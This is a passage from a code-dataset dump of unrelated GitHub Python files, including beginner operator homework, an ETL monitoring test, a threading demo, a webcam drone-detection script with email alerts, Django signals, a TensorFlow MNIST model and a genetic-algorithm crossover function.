topic.index(\"program\"))\n\n####Today's Homework\n#####Arithematic operations in function\n# Python Arithmetic Operators\n# Arithmetic operators are used with numeric values to perform common mathematical operations:\n# Operator\t Name\n# +\tAddition\t x + y\n# -\tSubtraction x - y\n# *\tMultiplication\t x * y\n# /\tDivision\t x / y\n# %\tModulus\t x % y\n# **\tExponentiation\t x ** y\n# //\tFloor division\t x // y\n\nx = int(input(\"enter x is:\"))\ny = int(input(\"enter y is:\"))\noperator =input(\"enter a operator is:\")\ndef multi_arithematicoperations(x,y, operator):\n if operator == 'sum':\n return x + y\n print(x+y)\n if operator == 'sub':\n return x - y\n print(x - y)\n if operator == 'mul':\n return x*y\n print(x*y)\n if operator == 'div':\n return x/y\n print(x/y)\n if operator == 'mod':\n return x%y\n print(x%y)\n if operator == 'expo':\n return x**y\n print(x**y)\n if operator == 'floor div':\n return x//y\n print(x//y)\n\n#########Python Comparison Operators\n# ==\tEqual\t x == y\n# !=\tNot equal\t x != y\n# >\t Greater than\t x > y\n# <\t Less than\t x < y\n# >=\tGreater than or equal to\t x >= y\n# <=\tLess than or equal to\t x <= y\n if operator == \"equalto\":\n return x == y\n print(x == y)\n if operator == \"notequalto\":\n print(x != y)\n return x != y\n if operator == \"greaterthan\":\n return x > y\n print(x > y)\n if operator == \"lessthan\":\n return x < y\n print(x < y)\n if operator == \"greaterthan or equalto\":\n return x >= y\n print(x >= y)\n if operator == \"lessthan or equalto\":\n return x <= y\n print(x <= y)\nprint(multi_arithematicoperations(x, y, operator))\n####PYTHON LOGICAL OPERATORS :\n# Operator\tDescription\n# and \tReturns True if both statements are true\t x < 5 and x < 10\n# or\tReturns True if one of the statements is true\t x < 5 or x < 4\n# not\tReverse the result, returns False if the result is true \tnot(x < 5 and x < 10)\n\ndef logical_operator(x,operator):\n\n if operator == 'and':\n return x < 5 and x <10\n print(x <5 and x<10)\n if operator == 'or':\n return x<5 or x<7\n print(x<5 or x<7)\n if operator == 'not':\n return( not(x<5 and x<8))\n\nx = int(input(\"enater x is:\"))\noperator = input(\"enter operator is: \")\nprint(logical_operator(x,operator))\n\n\n\n","repo_name":"padmajalanka/tutorials","sub_path":"homework/todayclasswork.py","file_name":"todayclasswork.py","file_ext":"py","file_size_in_byte":3198,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"33512645762","text":"import datetime\n\nimport pytest\n\nfrom taxi.maintenance import run\nfrom taxi.util import dates\n\nfrom atlas_etl.crontasks import delay_monitoring\n\n\nTIMESTAMP_NOW = 1619827200\nNOW = datetime.datetime.utcfromtimestamp(TIMESTAMP_NOW)\n\n\n@pytest.mark.now(NOW.isoformat())\nasync def test_solomon_stats(cron_context, loop, get_stats_by_label_values):\n stuff_context = run.StuffContext(\n lock=None,\n task_id='some-id',\n start_time=dates.utcnow(),\n data=cron_context,\n )\n await delay_monitoring.do_stuff(stuff_context, loop)\n\n stats = get_stats_by_label_values(cron_context, {'sensor': 'delay'})\n assert stats == [\n {\n 'kind': 'DGAUGE',\n 'labels': {'etl_name': 'ods.weather', 'sensor': 'delay'},\n 'timestamp': 1619827200.0,\n 'value': 12059100.0,\n },\n {\n 'kind': 'DGAUGE',\n 'labels': {\n 'etl_name': 'opteum.driver_order_metrics',\n 'sensor': 'delay',\n },\n 'timestamp': 1619827200.0,\n 'value': 11022300.0,\n },\n {\n 'kind': 'DGAUGE',\n 'labels': {'etl_name': 'ods.food_orders', 'sensor': 'delay'},\n 'timestamp': 1619827200.0,\n 'value': 4470480.0,\n },\n {\n 'kind': 'DGAUGE',\n 'labels': {\n 'etl_name': 'ods.callcenter_call_history',\n 'sensor': 'delay',\n },\n 'timestamp': 1619827200.0,\n 'value': 52314900.0,\n },\n {\n 'kind': 'DGAUGE',\n 'labels': {'etl_name': 'ods.scooter_orders', 'sensor': 'delay'},\n 'timestamp': 1619827200.0,\n 'value': 287100.0,\n },\n {\n 'kind': 'DGAUGE',\n 'labels': {'etl_name': 'ods.scooter_positions', 'sensor': 'delay'},\n 'timestamp': 1619827200.0,\n 'value': 200700.0,\n },\n ]\n","repo_name":"Alexander-Berg/2022-tests-examples-2","sub_path":"Taxi/test_atlas_etl/cron/test_delay_monitoring.py","file_name":"test_delay_monitoring.py","file_ext":"py","file_size_in_byte":1952,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"33351549735","text":"import threading\nimport os\nimport subprocess\nimport time\n\n\ndef fun_daemon():\n\tprint(\"Daemon thread started\")\n\ttime.sleep(5)\n\tsubprocess.check_output(\"notepad.exe\",shell=True)\n\tprint(\"I may never get displayed\")\n\n\ndef fun_nondaemon():\n\tprint(\"non daemon thread started\")\n\tfor i in range(1,500):\n\t\tprint(\"Non daemon Iteration:\",i)\n\tprint(\"Non daemon thread ended\")\n\nprint(\"Main thread started\")\nt1 = threading.Thread(target=fun_daemon)\nt2 = threading.Thread(target=fun_nondaemon)\nt1.setDaemon(True)\nt1.start()\nt2.start()\nfor x in xrange(1,10):\n\tprint(\"Main thread in iteration \", x)","repo_name":"reg1reg1/GoshDarnAlgorithmicProgramming","sub_path":"Gfg/GFG Python/ysingthread.py","file_name":"ysingthread.py","file_ext":"py","file_size_in_byte":580,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"43553401225","text":"from keras.models import load_model\nimport keras\nprint(\"keras version \" + keras.__version__)\n\nimport numpy\nprint(\"numpy version \" + numpy.__version__)\n\nimport tensorflow\nprint(\"tensorflow version \" + tensorflow.__version__)\n\nimport h5py\nprint(\"h5py version \" + h5py.__version__)\n\nfrom PIL import Image, ImageOps\nimport numpy as np\n\nimport cv2\nprint(\"cv2 version \" + cv2.__version__)\n\nimport os\nimport smtplib\nimport time\nimport datetime\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\nfrom email.mime.image import MIMEImage\n\n#import RPi.GPIO as GPIO\nfrom time import sleep\n\n# GPIO.setwarnings(False)\n# GPIO.setmode(GPIO.BCM)\n# \n# GPIO.setup(17,GPIO.OUT) #GPIO 4 -> Motor 1 terminal A\n\ndef stop():\n #GPIO.output(17,True) #2A+\n pass\n\n\nstrFrom = 'from@gmail.com'\nstrTo = 'to@gmail.com'\n\n\ndef send_mail(drone_type):\n\n # Define these once; use them twice!\n DateTimefilename = datetime.datetime.now() .strftime (\"%Y-%m-%d-%H.%M.%S\")\n \n # Create the root message and fill in the from, to, and subject headers\n msgRoot = MIMEMultipart('related')\n msgRoot['Subject'] = 'Waste Alert!!! ' + DateTimefilename\n msgRoot['From'] = strFrom\n msgRoot['To'] = strTo\n \n msgRoot.preamble = 'This is a multi-part message in MIME format.'\n\n # Encapsulate the plain and HTML versions of the message body in an\n # 'alternative' part, so message agents can decide which they want to display.\n msgAlternative = MIMEMultipart('alternative')\n msgRoot.attach(msgAlternative)\n\n\n msgText = MIMEText('This is the alternative plain text message.')\n msgAlternative.attach(msgText)\n\n # We reference the image in the IMG SRC attribute by the ID we give it below\n# msgText = MIMEText('Garbage Waste - Detected.

        From: Alpha Technologies!', 'html')\n# msgAlternative.attach(msgText)\n\n if(drone_type == 0):\n # We reference the image in the IMG SRC attribute by the ID we give it below\n msgText = MIMEText('Enemy Drone White - Detected.

        From: Alpha Technologies!', 'html')\n msgAlternative.attach(msgText)\n # This example assumes the image is in the current directory\n fp = open('/root/projects/drone_detection/white_enemy/0.jpg', 'rb')\n elif(drone_type == 1):\n # We reference the image in the IMG SRC attribute by the ID we give it below\n msgText = MIMEText('Friend Drone Black - Detected.

        From: Alpha Technologies!', 'html')\n msgAlternative.attach(msgText)\n # This example assumes the image is in the current directory\n fp = open('/root/projects/drone_detection/black_friend/0.jpg', 'rb')\n \n msgImage = MIMEImage(fp.read())\n fp.close()\n\n # Define the image's ID as referenced above\n msgImage.add_header('Content-ID', '')\n msgRoot.attach(msgImage)\n \n # Send the email (this example assumes SMTP authentication is required)\n \n smtp = smtplib.SMTP('smtp.gmail.com', 587)\n smtp.starttls()\n smtp.login( strFrom, 'set_mail_password_here') \n smtp.sendmail(strFrom, strTo, msgRoot.as_string())\n smtp.quit()\n print (\"Thank You E-Mail has been Send to %s\" % strTo)\n\n\nvideo = cv2.VideoCapture(0)\n\n# Load the model\nmodel = load_model('keras_model.h5')\n\nframe_count = 10\n\nfinalize_white_enemy_drone_count = []\nfinalize_black_friend_drone_count = []\n\nwhile True:\n \n _, frame = video.read()\n \n data = np.ndarray(shape=(1, 224, 224, 3), dtype=np.float32)\n\n color_coverted = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n\n im = Image.fromarray(color_coverted)\n\n size = (224, 224)\n \n image = ImageOps.fit(im, size, Image.ANTIALIAS) \n\n image_array = np.asarray(image)\n # Normalize the image\n normalized_image_array = (image_array.astype(np.float32) / 127.0) - 1\n # Load the image into the array\n data[0] = normalized_image_array\n\n # run the inference\n prediction = model.predict(data)\n class_name = ['white_friend','black_enemy','no_wastes']\n output = [class_name[np.argmax(prediction)]]\n #print(output)\n #print([class_name[np.argmax(prediction)]])\n# print(prediction)\n\n# d_w = np.argmax(prediction)\n# print(d_w)\n \n x=prediction[0][0]\n y=prediction[0][1]\n #z=prediction[0][2]\n \n print(\"X is \" + str(x))\n print(\"Y is \" + str(y))\n# print(z)\n\n if(x > 0.9 and y < 0.5):\n print(\"Found White Enemy Drone\") \n finalize_white_enemy_drone_count.append(\"white_friend\")\n #print(finalize_white_enemy_drone_count)\n #process last 10 frames\n if( len(finalize_white_enemy_drone_count) >= 10 ):\n #check if the list has all 10 frames same obj \n if(all(map(lambda x: x == finalize_white_enemy_drone_count[0], finalize_white_enemy_drone_count[1:]))):\n print(\"Last\" + str(frame_count) + \"Frame Accuracy White Friend Drone\")\n finalize_white_enemy_drone_count.clear()\n send_mail(0)\n #stop()\n #sleep(15)\n \n elif(x < 0.5 and y > 0.9):\n print(\"Found Black Friend Drone\") \n finalize_black_friend_drone_count.append(\"white_friend\")\n #print(finalize_white_enemy_drone_count)\n #process last 10 frames\n if( len(finalize_black_friend_drone_count) >= 10 ):\n #check if the list has all 10 frames same obj \n if(all(map(lambda x: x == finalize_black_friend_drone_count[0], finalize_black_friend_drone_count[1:]))):\n print(\"Last\" + str(frame_count) + \"Frame Accuracy Black Enemy Drone\")\n finalize_black_friend_drone_count.clear()\n send_mail(1)\n #stop()\n #sleep(15)\n \n else:\n print(\"No Drone Found\")\n\n\n cv2.imshow(\"Prediction\", frame)\n key=cv2.waitKey(1)\n if key == ord('q'):\n break\n\nvideo.release()\ncv2.destroyAllWindows()\n\n","repo_name":"thamo-nature/enemy-drone-detection-live-cam","sub_path":"detect_drone.py","file_name":"detect_drone.py","file_ext":"py","file_size_in_byte":6314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"382581145","text":"from sqlalchemy import func, text\nimport datetime as dt\nfrom models import db_session_users, UserDocument, UserAgency\nimport schemas.jurasticsearch as jsearch\nfrom user_helper import get_external_user_id_subquery\n\n# gets the N most popular docs - using how many times a document has been marked \"read\" as a proxy for popularity\ndef get_most_popular_docs(params):\n num_queries = params.get(\"num_queries\", 5) # n.b. 5 is an arbitrary default\n\n # use thirty days ago as the limit of the time range for popularity\n # n.b. bookmarkings could potentially impact this - but that is another potential way to gauge popularity so\n # that should be ok\n thirty_days_ago = dt.datetime.now() - dt.timedelta(days=30)\n\n most_popular_docs = db_session_users.query(UserDocument.doc_id, func.count(UserDocument.doc_id).label('total'))\\\n .filter_by(read=True).filter(UserDocument.user_id.in_(get_external_user_id_subquery()))\\\n .filter(UserDocument.updated_at > thirty_days_ago).group_by(UserDocument.doc_id)\\\n .order_by(text('total desc')).limit(num_queries).all()\n\n # retrieve the document titles so we can include them in the payload with just one extra ES call\n query = {\n \"query\": {\n \"bool\": {\n \"must\": {\n \"terms\": {\"id\": [d[0] for d in most_popular_docs]}\n }\n }\n },\n \"_source\": {\"include\": [\"id\", \"title\"]}\n }\n docs_with_titles = jsearch.query_records(query, 'documents')\n\n # create a map of the doc titles so we can easily tack this on to the id/count below\n doc_id_title_map = {d['id']: d['title'] for d in docs_with_titles}\n\n return {\n \"popular_docs\": [\n {\"doc_id\": d[0], \"title\": doc_id_title_map[d[0]], \"count\": d[1]} for d in most_popular_docs]\n }\n\n\n# gets the N most popular sources - using how many times an agency has been followed as a proxy for popularity\n# n.b. limiting to just federal agencies for now\ndef get_most_popular_sources(params):\n num_queries = params.get(\"num_queries\", 5) # n.b. 5 is an arbitrary default\n fed_agency_ids = get_all_fed_agency_ids()\n\n most_popular_sources = db_session_users.query(UserAgency.agency_id, func.count(UserAgency.agency_id).label('total')) \\\n .filter(UserAgency.user_id.in_(get_external_user_id_subquery()))\\\n .filter(UserAgency.agency_id.in_(fed_agency_ids)).group_by(UserAgency.agency_id).order_by(text('total desc'))\\\n .limit(num_queries).all()\n\n return {\n \"popular_sources\": [{\"agency_id\": d[0], \"count\": d[1]} for d in most_popular_sources]\n }\n\n# class to memoize the federal agency_ids in our system so we don't need to look these up each time\n# note: the set of possible agency_ids changes very infrequently, so lets make the update interval every day\nclass FedAgencyIdMemoizer:\n def __init__(self):\n self.memoized_agency_ids_for_search = None\n self.last_memoized_time = None\n\n def get_agency_ids(self):\n if self.memoized_agency_ids_for_search is not None and self.last_memoized_time > dt.datetime.now() - dt.timedelta(days=1):\n return self.memoized_agency_ids_for_search\n else:\n self.last_memoized_time = dt.datetime.now()\n\n query = {\n \"query\": {\n \"bool\": {\n \"must\": {\n \"term\": {\"type\": \"federal_executive\"}\n }\n }\n },\n # n.b. 1000 is arbitrary but needs to be set higher than the total # of fed agencies (currently ~400)\n \"size\": 1000,\n \"_source\": {\"include\": [\"id\"]}\n }\n agency_ids = [a['id'] for a in jsearch.query_records(query, 'agencies')]\n\n self.memoized_agency_ids_for_search = agency_ids\n return self.memoized_agency_ids_for_search\n\nagency_id_memoizer = FedAgencyIdMemoizer()\ndef get_all_fed_agency_ids():\n return agency_id_memoizer.get_agency_ids()","repo_name":"ReactARDev/React_Redux_Python","sub_path":"backend/helpers/popular_entity_helper.py","file_name":"popular_entity_helper.py","file_ext":"py","file_size_in_byte":4022,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17077103175","text":"import time\n\nimport pandas as pd\nfrom pydantic import BaseModel\n\nfrom binanceTrade.autotrader import enums, logger\n\n\nclass SymbolKline(BaseModel):\n symbol: str = \"\"\n interval: enums.Interval = None\n dfKline: pd.DataFrame = None\n last_update: int = None\n name: str = None\n\n class Config:\n arbitrary_types_allowed = True\n\n def __init__(self, *args, **kwargs):\n super().__init__(**kwargs)\n self.name = f'{self.symbol}_{self.interval.name}'\n self.last_update = int(time.time() * 100)\n\n # def _check_data_integrity(self):\n # \"\"\"Checking data continuity by 'time_open'\n #\n # :return:\n # :rtype:\n # \"\"\"\n # list_time_open = tuple(self.dfKline['time_open'].to_list())\n # for i in range(1, len(list_time_open)):\n # if list_time_open[i] != list_time_open[i - 1] + self.interval.ms:\n # raise ValueError(\"The integrity of the data is violated\")\n\n\nclass SymbolKlineWithEMA(SymbolKline):\n short: int = 1\n middle: int = 1\n long: int = 1\n\n def __init__(self, *args, **kwargs):\n super().__init__(**kwargs)\n self._ema_calculate()\n\n def _get_ema(self, index: int, period: int):\n \"\"\"Get values MAs for 'index'. Last line have 'index' = 0\n\n :param index: 0 - value now, 1 - value previous bar ...\n :type index: int\n :param period: self.short or self.middle or self.long\n :type period: int\n :return: value MA with :period: and (len(df.index)-index)\n :rtype: float\n \"\"\"\n col = f'ema_{period}'\n return self.dfKline[col].iloc[-index - 1]\n\n def shortEMA(self, index: int):\n return self._get_ema(index, self.short)\n\n def middleEMA(self, index: int):\n return self._get_ema(index, self.middle)\n\n def longEMA(self, index: int):\n return self._get_ema(index, self.long)\n\n def update(self, data: dict):\n \"\"\"Recieving data dictionary from WSS and update :self.dfKline:\n\n :param data:\n :type data:\n \"\"\"\n\n new_row = {\n 'time_open': data.get('T'),\n 'open': float(data.get('o')),\n 'high': float(data.get('h')),\n 'low': float(data.get('l')),\n 'close': float(data.get('c')),\n 'volume': float(data.get('v')),\n 'time_close': data.get('T'),\n 'q_asset_vol': float(data.get('q')),\n 'num_trades': data.get('n'),\n 'tb_base_av': float(data.get('V')),\n 'tb_quote_av': float(data.get('Q')),\n 'ignore': data.get('B')\n }\n\n def _ema(period, close, previous):\n k = 2 / (period + 1)\n ema = close * k + previous * (1 - k)\n return ema\n\n _close = new_row.get('close')\n df = self.dfKline\n # New EMA values add to data from stream\n for period in (self.short, self.middle, self.long):\n # Previous EMA value take\n previous: int\n try:\n previous = df.loc[df['time_open'] == data.get('t') - self.interval.ms, f'ema_{period}'].values[0]\n except Exception as e:\n logger.error(\"Continuity destroyed.\", e)\n\n new_row[f'ema_{period}'] = \\\n _ema(\n period,\n _close,\n previous\n )\n\n if new_row['time_open'] not in self.dfKline['time_open'].values:\n # Add row\n self.dfKline = pd.concat([self.dfKline, pd.DataFrame(new_row, index=[0])], join='outer', ignore_index=True)\n else:\n # Update row\n self.dfKline.update(pd.DataFrame(new_row, index=[df.loc[df['time_open'] == new_row['time_open']].index[0]]),\n overwrite=True)\n # logger.debug(self.name)\n # logger.debug(self.dfKline.tail(1))\n # self.last_update = int(time.time() * 1000)\n\n def _ema_calculate(self):\n \"\"\"DataFrame must have int index for iteration\n\n :return:\n :rtype:\n \"\"\"\n\n for period in (self.short, self.middle, self.long):\n # if period is None:\n # continue\n k = 2 / (period + 1)\n self.dfKline[f'ema_{period}'] = None\n self.dfKline[f'ema_{period}'] = self.dfKline[f'ema_{period}'].astype('float')\n\n previous_ema = self.dfKline.iloc[0]['close']\n for i, row in self.dfKline.iterrows():\n close = row['close']\n new_ema = close * k + previous_ema * (1 - k)\n self.dfKline.loc[i, f'ema_{period}'] = new_ema\n previous_ema = new_ema\n\n # self.df_list.append(df)\n # return df\n\n","repo_name":"zenBool/traderFastAPI","sub_path":"binanceTrade/autotrader/models/symbol_kline.py","file_name":"symbol_kline.py","file_ext":"py","file_size_in_byte":4720,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25100778742","text":"import tensorflow as tf\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.metrics import confusion_matrix\n\nfrom tensorflow.examples.tutorials.mnist import input_data\ndata = input_data.read_data_sets(\"data/MNIST/\", one_hot=True)\n\nprint('Size of dataset:')\nprint('Training size:{}'.format(len(data.train.labels)))\nprint('Test size:{}'.format(len(data.test.labels)))\nprint('Validation size:{}'.format(len(data.validation.labels)))\n# print(type(data.train.labels))\n\n# check one hot encoding\n# print(data.test.labels[:5,:])\n\n# store label as column vector\ndata.test.cls = np.array([label.argmax() for label in data.test.labels])\n# print(data.test.cls[:5])\n\n# hyperparameters\nimage_size = 28\nimage_shape = image_size * image_size\nnum_classes = 10\nlearning_rate = 0.005\n\n# function for plotting image\ndef plot_image(images, true_class):\n\n # img_len = np.array(len(images))\n # plot_shape = np.reshape(img_len, [-1, 4])\n fig, axes = plt.subplots(3, 4)\n for i, ax in enumerate(np.ravel(axes)):\n image = np.reshape(images[i], [image_size, image_size])\n ax.imshow(image, cmap='binary')\n xlabel = 'True class:{}'.format(true_class[i])\n ax.set_xlabel(xlabel)\n ax.set_xticks([])\n ax.set_yticks([])\n\n plt.show()\n return\n\n\n# plot_image(data.test.images[:12,:], data.test.cls[:12])\n\n\n# reset tf graph\ntf.reset_default_graph()\n\nX = tf.placeholder(tf.float32, [None, image_shape], name='input')\nY = tf.placeholder(tf.float32, [None, num_classes], name='labels')\ny_true_cls = tf.placeholder(tf.int64, [None], name='trueclass')\n\nweights = tf.Variable(tf.random_normal([image_shape, num_classes], stddev=0.02),name='weights')\nbiases = tf.Variable(tf.zeros([num_classes]), name='biases')\n\nlogits = tf.matmul(X, weights) + biases\n\n# normalize the probabolity value so sum upto 1 for each row.\ny_pred = tf.nn.softmax(logits)\n\n# get the predicted class for each sample using argmax\ny_pred_cls = tf.argmax(y_pred, axis=1)\n\nentropy = tf.nn.softmax_cross_entropy_with_logits(logits=logits, labels=Y)\ncost = tf.reduce_mean(entropy)\n\noptimizer = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(cost)\n\n# performance measures\ncorrect_prediction = tf.equal(y_pred_cls, y_true_cls)\naccuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n\n\n# dictionary to be feed for test result calculations\nfeed_dict_test = {X: data.test.images,\n Y: data.test.labels,\n y_true_cls: data.test.cls}\n\n# Confusion matrix definition\ndef print_confusion_matrix(sess, true_class):\n predicted_class = sess.run(y_pred_cls, feed_dict=feed_dict_test)\n\n cm = confusion_matrix(y_true=true_class, y_pred=predicted_class)\n\n print('confusion matrix for MNIST data:{}'.format(cm))\n\n plt.imshow(cm, interpolation='nearest', cmap=plt.cm.Blues)\n plt.tight_layout()\n plt.colorbar()\n tick_marks = np.arange(num_classes)\n plt.xticks(tick_marks, range(num_classes))\n plt.yticks(tick_marks, range(num_classes))\n plt.xlabel('Predicted')\n plt.ylabel('True')\n plt.show()\n\n return\n\n\n# plot weights to visualize the optimization and structure of weights learned with time.\ndef plot_weights(sess):\n w = sess.run(weights)\n\n w_min = np.min(w)\n w_max = np.max(w)\n\n fig, axes = plt.subplots(2, 5)\n fig.subplots_adjust(hspace=0.3, wspace=0.3)\n\n for i, ax in enumerate(axes.flat):\n image = w[:,i].reshape([image_size, image_size])\n ax.set_xlabel('weight:{0}'.format(i))\n ax.imshow(image, vmin=w_min, vmax=w_max, cmap='seismic')\n ax.set_xticks([])\n ax.set_yticks([])\n plt.show() \n return\n\n\n# define cost and accuracy plotting function\ndef plot_cost_accuracy(cost, accuracy):\n fig, (ax1, ax2) = plt.subplots(1, 2)\n ax1.plot(cost)\n ax1.set_xlabel('Training steps')\n ax1.set_ylabel('Cost')\n ax2.plot(accuracy)\n ax2.set_xlabel('Training steps')\n ax2.set_ylabel('Accuracy')\n\n plt.show()\n\n return\n\n\n# start training process\ndef training(dict_test, is_confusion_matrix=False, is_plot_weights=False, is_plot_cost_accuracy=False):\n avg_cost = []\n avg_accuracy = []\n epochs = 3\n batch_size = 100\n init = tf.global_variables_initializer()\n\n with tf.Session() as session:\n session.run(init)\n\n for epoch in range(1000):\n x_batch, y_batch = data.train.next_batch(batch_size)\n feed_dict_train = {X: x_batch, Y: y_batch}\n cal_cost, _ = session.run([cost, optimizer], feed_dict=feed_dict_train)\n\n avg_cost.append(cal_cost)\n\n if epoch % 100 == 0:\n cal_accuracy = session.run(accuracy, feed_dict=dict_test)\n avg_accuracy.append(cal_accuracy)\n\n print('Cost after {0} steps:{1}'.format(epoch, cal_cost))\n print('Accuracy after {0} steps:{1}'.format(epoch, cal_accuracy))\n\n # print confusion matrix\n if is_confusion_matrix:\n print_confusion_matrix(session, data.test.cls)\n \n # print weights plot\n if is_plot_weights:\n plot_weights(session)\n\n # plot cost and accuracy graph\n if is_plot_cost_accuracy:\n plot_cost_accuracy(avg_cost, avg_accuracy)\n\n session.close()\n return\n\n\n# check training status\ntraining(feed_dict_test)\n# training(feed_dict_test, is_plot_cost_accuracy=True)\n# training(feed_dict_test, is_plot_weights=True, is_plot_cost_accuracy=True)\n# training(feed_dict_test, is_confusion_matrix=True, is_plot_weights=True, is_plot_cost_accuracy=True)\n\n\n","repo_name":"mkumar73/neural-nets","sub_path":"01.linear_model_v1.py","file_name":"01.linear_model_v1.py","file_ext":"py","file_size_in_byte":5542,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"37215094217","text":"# uniform crossover\n\n# assign \"heads\" to one parent, \"tails\" to the other\n# flip a coin for each gene of the first child\n# make an inverse copy of the gene for the second child\n# inheritance is independent of position\n\nimport random\n\n\ndef uniformXover(parent1, parent2):\n offspring1 = \"\"\n for i in range(len(parent1)):\n coinflip = random.randint(0, 1)\n if coinflip == 0:\n #print(\"choose parent 1\", parent1[i])\n offspring1 = offspring1 + parent1[i]\n else:\n #print(\"choose parent 2\", parent2[i])\n offspring1 = offspring1 + parent2[i]\n\n offspring2 = \"\"\n for i in offspring1:\n if i == '0':\n offspring2 = offspring2 + '1'\n else:\n offspring2 = offspring2 + '0'\n\n #print(offspring1)\n #print(offspring2)\n return offspring1, offspring2\n\n\n#uniformXover('0000010110101110010110111010', '1000101010010011001000101101')\n","repo_name":"emedema/phm_evolutionary_optimization","sub_path":"ga_code/recombination.py","file_name":"recombination.py","file_ext":"py","file_size_in_byte":929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39564604711","text":"import json\nimport os\nimport shutil\nimport tempfile\nimport unittest\n\nimport gen_html\n\nTEST_DATA = {\n 'test1':\n {'kubernetes-release': [{'build': 3, 'failed': False, 'time': 3.52},\n {'build': 4, 'failed': True, 'time': 63.21}],\n 'kubernetes-debug': [{'build': 5, 'failed': False, 'time': 7.56},\n {'build': 6, 'failed': False, 'time': 8.43}],\n },\n 'test2':\n {'kubernetes-debug': [{'build': 6, 'failed': True, 'time': 3.53}]},\n}\n\nclass GenHtmlTest(unittest.TestCase):\n \"\"\"Unit tests for gen_html.py.\"\"\"\n # pylint: disable=invalid-name\n\n def testHtmlHeader_NoScript(self):\n result = '\\n'.join(gen_html.html_header('', False))\n self.assertNotIn('\\ntest2', html)\n self.assertNotIn('debug', html)\n\n def testGenHtmlFilterExact(self):\n \"\"\"Test that filtering to an exact name works.\"\"\"\n html = self.gen_html('release', True)\n self.assertIn('release', html)\n self.assertNotIn('debug', html)\n\n def testGetOptions(self):\n \"\"\"Test argument parsing works correctly.\"\"\"\n\n def check(args, expected_output_dir, expected_input):\n \"\"\"Check that args is parsed correctly.\"\"\"\n options = gen_html.get_options(args)\n self.assertEquals(expected_output_dir, options.output_dir)\n self.assertEquals(expected_input, options.input)\n\n\n check(['--output-dir=foo', '--input=bar'], 'foo', 'bar')\n check(['--output-dir', 'foo', '--input', 'bar'], 'foo', 'bar')\n check(['--input=bar', '--output-dir=foo'], 'foo', 'bar')\n\n def testGetOptions_Missing(self):\n \"\"\"Test missing arguments raise an exception.\"\"\"\n def check(args):\n \"\"\"Check that args raise an exception.\"\"\"\n with self.assertRaises(SystemExit):\n gen_html.get_options(args)\n\n check([])\n check(['--output-dir=foo'])\n check(['--input=bar'])\n\n def testMain(self):\n \"\"\"Test main() creates pages.\"\"\"\n temp_dir = tempfile.mkdtemp(prefix='kube-test-hist-')\n try:\n tests_json = os.path.join(temp_dir, 'tests.json')\n with open(tests_json, 'w') as buf:\n json.dump(TEST_DATA, buf)\n gen_html.main(tests_json, temp_dir)\n for page in (\n 'index',\n 'tests-kubernetes',\n 'suite-kubernetes-release',\n 'suite-kubernetes-debug'):\n self.assertTrue(os.path.exists('%s/%s.html' % (temp_dir, page)))\n finally:\n shutil.rmtree(temp_dir)\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"ghodss/kubernetes","sub_path":"hack/jenkins/test-history/gen_html_test.py","file_name":"gen_html_test.py","file_ext":"py","file_size_in_byte":4047,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"24669238122","text":"from students.models import Student\nfrom personnel.models import Payee\nfrom django.db.models.signals import post_save\nfrom django.dispatch import receiver\nfrom schools.models import GraduatingClass\nfrom .models import StudentAccount, PayeeAccount, RevenueLedgerAccount, SchoolFee\n\n\n@receiver(post_save, sender=Student, dispatch_uid=\"create_linked_student_account\")\ndef create_student_account(sender, instance, created, **kwargs):\n if created:\n StudentAccount.objects.create(student=instance)\n\n\n@receiver(post_save, sender=Payee, dispatch_uid=\"create_linked_payee_account\")\ndef create_payee_account(sender, instance, created, **kwargs):\n if created:\n PayeeAccount.objects.create(payee=instance)\n\n\n@receiver(post_save, sender=GraduatingClass, dispatch_uid=\"create_linked_school_fees_for_graduating_class\")\ndef create_school_fees_for_graduating_class(sender, instance, created, **kwargs):\n if created:\n for ledger_account in RevenueLedgerAccount.objects.filter(is_student_fee=True).all():\n SchoolFee.objects.create(ledger_account=ledger_account, graduating_class=instance)\n\n\n@receiver(post_save, sender=RevenueLedgerAccount, dispatch_uid=\"create_linked_school_fees_for_ledger_account\")\ndef create_school_fees_for_ledger_account(sender, instance, created, **kwargs):\n existing_fees = SchoolFee.objects.filter(ledger_account=instance).iterator()\n if instance.is_student_fee:\n for graduating_class in GraduatingClass.objects.all():\n if graduating_class not in existing_fees:\n SchoolFee.objects.create(ledger_account=instance, graduating_class=graduating_class)\n","repo_name":"Frisesomorum/epobs","sub_path":"epobs-django/finance/signals.py","file_name":"signals.py","file_ext":"py","file_size_in_byte":1635,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30032786079","text":"\"\"\"\nCreate a plot_operations.py module with a PlotOperations class inside.\n• Use the Python matplotlib to create a basic boxplot:\n◦ https://matplotlib.org/examples/pylab_examples/boxplot_demo.html\n\"\"\"\nimport matplotlib.pyplot as plt\n\n\nclass PlotOperations:\n \"\"\"\n Be creative. One way is a dictionary of lists. For example:\n • weather_data = {1: [1.1, 5.5, 6.2, 7.1], 2: [8.1, 5.4, 9.6, 4.7]}\n • The dictionary key is the month: January = 1, February = 2 etc...\n • The data is all the mean temperatures for each day of that month.\n \"\"\"\n\n def diplay_box_plot(self, my_list, from_year, to_year):\n \"\"\"\n A boxplot displaying one box per month, so it shows all\n 12 months of the year on one plot.\n \"\"\"\n title = 'Monthly Temperature Distribution for: ' + str(from_year) + ' to ' + 